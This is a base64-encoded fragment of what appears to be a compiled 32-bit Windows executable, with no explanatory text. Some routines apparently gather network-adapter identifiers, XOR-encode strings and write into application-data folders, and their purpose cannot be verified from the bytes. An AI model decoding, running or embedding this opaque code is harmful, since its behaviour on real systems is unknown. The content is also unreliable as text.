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AVokO/xW8YEAAg8QEXsPMzMzMzMzMzMzMVYvsUVaLdQhWg8EYx0X8AAAAAOiI+///i8Zei+VdwgQAzMzMzMzMzMzMzMzMzMzMVYvsVleNeaCNd2CLzugO+v//ocRgQACJBosNwGBAAFaJDv8VvGBAAIPEBPZFCAF0CVfotw0AAIPEBIvHX15dwgQAzMzMzMzMzMzMzMzMzMxVi+xq/2iLUEAAZKEAAAAAUIHsxAAAAFNWV6HokkAAM8VQjUX0ZKMAAAAAM9uJXeyhxGBAAMeFRP///yhjQADHhVT///8YY0AAiUWkU42NXP///1G+AgAAAI2NRP///8dF/AEAAACJdez/FcxgQACLlUT///+LQgSNjVz///+JdfzHhAVE////FGNAAP8VqGBAAMeFXP///5RiQACJXZiJXZyLRQzHRfwEAAAAOVgQdnvrAovBg3gUEHIHiwiJTfDrA4lF8GoAjZU0////agJS/xX0YEAAg8QMaGAUQACNjVT///+L+P8V7GBAAIvwhfZ0B4sGi0AEA8aLTwyLVwhRUlCLB//Qiw6LQQSLVfDGRDBAMA+2BBqDxAxQi87/FfBgQACLTQxDOVkQd4eLdQhWjY1E////6EX+//+LhUT///+LSASNVaTHRewDAAAAiVUMx4QNRP///xRjQAC7BQAAAI2VXP///4ld/IlV8MeFXP///5RiQAD2RZwBxkX8BnQRi4Vs////iwBQ6A8MAACDxARqAGoAagCNjVz/////FdRgQACLjXD////HAQAAAACLVYDHAgAAAACLRZDHAAA
AAACDZZz+jY1c////x0WYAAAAAIhd/P8VfGBAAI2NXP///8ZF/AD/FbRgQACNTaT/FchgQACLxotN9GSJDQAAAABZX15bi+Vdw8zMzMzMzMxVi+xq/2gdUUAAZKEAAAAAUIHslAEAAKHokkAAM8WJRexTVldQjUX0ZKMAAAAAiWXwi0UIi30MiYUQ////jVABighAhMl1+SvCdQiDyP/pbQYAAI2FbP///1Do8dj//4PEBLkPAAAAM/aJjUj///+JtUT////GhTT///8Ai4UQ////ilABihiJdfyIlRf///+JjWT///+JtWD////GhVD///8AxkX8AesHjaQkAAAAAGoBaExjQACNjVD////ojuv//4O9ZP///xCLhVD///9zBo2FUP///4qMNWz///+IDDBGg/48csmLx41QAY1kJACKCECEyXX5K8JQV42NUP///+hK6///M8k5jWD///92QA+2tRf////rB42kJAAAAACDvWT///8Qi4VQ////cwaNhVD///8wHAgPtsMPr8CNREAKmff+QYraO41g////ctCNlVD///9SjYUY////UOiN/P//g8QIi/CNjVD///87znR3g71k////EHIPi5VQ////UugHCgAAg8QEM/+7DwAAAImdZP///4m9YP///8aFUP///wCDfhQQcxiLRhBAUI2FUP///1ZQ/xXgYUAAg8QM6wqLDomNUP///4k+i1YQiZVg////i0YUiYVk////iV4UiX4QxgYA6we7DwAAADP/g70s////EHIPi40Y////UeiJCQAAg8QEjZU0////UleD7ByLzIlZFIudEP///4vDiXkQxkX8A4mlDP///8YBAI1wAYoQQITSdfkrxlBT6B3o///o+Pf//4uFNP///74QAAAAg8QkObVI////cwaNhTT///9qAWpAaiJQjY1g/v//6Er0///GRfwEOb24/v//D4SoAAAAi4VQ////ObVk////cwaNhVD///+LjWD///9XUVCNjWD+////FfhgQACNtWT+//85vbj+//90IYvO6Kzs//+EwHUCM/aLlbj+//9S/xVMYUAAg8QEhcB0AjP2jY1k/v//xoW0/v//AMaFrf7//wD/FVRgQAChCJNAAIm9uP7//4mFsP7//4m9qP7//zv3dRmLjWD+//+LSQRXagKNjA1g/v///xUUYUAAi4Vg/v//i0gEjZXA/v//iZUM////x4QNYP7//yRjQACNlWT+//+JlQj////HhWT+///UYkAAxkX8Bjm9uP7//3Qti4V0/v//iwCNjaz+//87wXUbi4Wk/v//i5Wg/v//UFBSjY1k/v///xXUYEAAgL20/v//AHRVOb24/v//dBuNjWT+///ot+v//4uFuP7//1D/FUxhQACDxASNjWT+///GhbT+//8AxoWt/v//AP8VVGBAAIsNCJNAAIm9uP7//4mNsP7//4m9qP7//42NZP7//8ZF/AX/FXxgQACLlWD+//+LDehgQACLQgSJjAVg/v//jY3A/v//xkX8A/8VyGBAAMdF/AEAAACLhRD///+NlTT///9SM/9qAYPsHIvMswjHQRQPAAAAiXkQiF38iaUI////xgEAjXABjaQkAAAAAIoQQITSdfkrxlCLhRD///9Q6Nrl///otfX//4uFNP///4PEJIO9SP///xBzBo2FNP///2oBakBqIlCNjWD+///oC/L//8ZF/Ak5vbj+//8PhKkAAACDvWT///8Qi4VQ////cwaNhVD///+LjWD///9XUVCNjWD+////FfhgQACNtWT+//85vbj+//90IYvO6Gzq//+EwHUCM/aLlbj+//9S/xVMYUAAg8QEhcB0AjP2jY1k/v//xoW0/v//AMaFrf7//wD/FVRgQAChCJNAAIm9uP7//4mFsP7//4m9qP7//zv3dRmLjWD+//+LSQRXagKNjA1g/v///xUUYUAAi4Vg/v//i0gEjZXA/v//iZUI////x4QNYP7//yR
jQACNlWT+//+JlQz////HhWT+///UYkAAxkX8Czm9uP7//3Qti4V0/v//iwCNjaz+//87wXUbi4Wk/v//i5Wg/v//UFBSjY1k/v///xXUYEAAgL20/v//AHRVOb24/v//dBuNjWT+///od+n//4uFuP7//1D/FUxhQACDxASNjWT+///GhbT+//8AxoWt/v//AP8VVGBAAIsNCJNAAIm9uP7//4mNsP7//4m9qP7//42NZP7//8ZF/Ar/FXxgQACLlWD+//+LDehgQACLQgSJjAVg/v//jY3A/v//iF38/xXIYEAAvhAAAAA5tWT///9yD4uVUP///1LoBQUAAIPEBMeFZP///w8AAADHhWD///8AAAAAxoVQ////ADm1SP///3IPi4U0////UOjTBAAAg8QEM8CLTfRkiQ0AAAAAWV9eW4tN7DPN6LwBAACL5V3Dx0X8AQAAALhoP0AAw7igQUAAw8xVi+xRVos1WGFAAFdoiAIAAMdF/IgCAAD/1ov4g8QEhf91CV+DyP9ei+Vdw41F/FBX6DQLAACD+G91Flf/FVRhQACLTfxR/9aL+IPECIX/dNKNVfxSVzP26A0LAACFwHU7i8eF/3RDi00IjZsAAAAAg/48fSeDuKABAAAGdRiLkJQBAACJFA5mi5CYAQAAZolUDgSDxgaLAIXAddSF/3QKV/8VVGFAAIPEBF8zwF6L5V3DzMzMzMzMzMzMzMzMzMxVi+xWi3UIajxqAFbo2QMAAFboKf///4PEEF5dw4tJBP8VTGBAAIXAdAiLEGoBi8j/EsOL/1WL7GoI6M8DAABZhcB0EIsNEJNAAIkIi00IiUgE6wIzwKMQk0AAXcNqBLhOUUAA6KsEAABqAI1N8P8VeGBAAINl/ADrF4vwiwCLzqMQk0AA6JP///9W6E4DAABZoRCTQACFwHXgg038/41N8P8VbGBAAOibBAAAw8z/JYBgQAD/JYRgQAD/JYhgQAD/JYxgQAD/JZBgQAD/JZRgQAD/JZhgQAD/JZxgQAD/JaBgQAA7DeiSQAB1AvPD6SAFAABodkpAAOj/BAAAoWCWQADHBCQsk0AA/zVclkAAoyyTQABoHJNAAGggk0AAaBiTQAD/FWBhQACDxBSjKJNAAIXAeQhqCOguBgAAWcNqEGiobkAA6OYHAAAz2zkdfJZAAHULU1NqAVP/FTBgQACJXfxkoRgAAACLcASJXeS/cJZAAFNWV/8VNGBAADvDdBk7xnUIM/ZGiXXk6xBo6AMAAP8VOGBAAOvaM/ZGoWyWQAA7xnUKah/ovgUAAFnrO6FslkAAhcB1LIk1bJZAAGgkYkAAaBhiQADoVQcAAFlZhcB0F8dF/P7///+4/wAAAOndAAAAiTU0k0AAoWyWQAA7xnUbaBRiQABoCGJAAOgaBwAAWVnHBWyWQAACAAAAOV3kdQhTV/8VPGBAADkdgJZAAHQZaICWQADoMwYAAFmFwHQKU2oCU/8VgJZAAKEck0AAiw10YUAAiQH/NRyTQAD/NSCTQAD/NRiTQADowMr//4PEDKMwk0AAOR0kk0AAdTdQ/xVwYUAAi0XsiwiLCYlN4FBR6DQFAABZWcOLZeiLReCjMJNAADPbOR0kk0AAdQdQ/xVoYUAAOR00k0AAdQb/FWRhQADHRfz+////oTCTQADorwYAAMO4TVoAAGY5BQAAQAB0BDPA6zWhPABAAIG4AABAAFBFAAB167kLAQAAZjmIGABAAHXdg7h0AEAADnbUM8k5iOgAQAAPlcGLwWoBoySTQAD/FZBhQABZav//FSxgQACLDWiWQACjdJZAAKN4lkAAoYxhQACJCKGIYUAAiw1klkAAiQjoIwQAAOiEBgAAgz0Ek0AAAHUMaLZMQAD/FYRhQABZ6EIGAACDPQCTQAD/dQlq//8VgGFAAFkzwMPoUwYAAOmz/f//i/9Vi+z2RQgCV4v5dCVWaIRNQACNd/z/NmoMV+jGAAAA9kUIAXQHVugmAAA
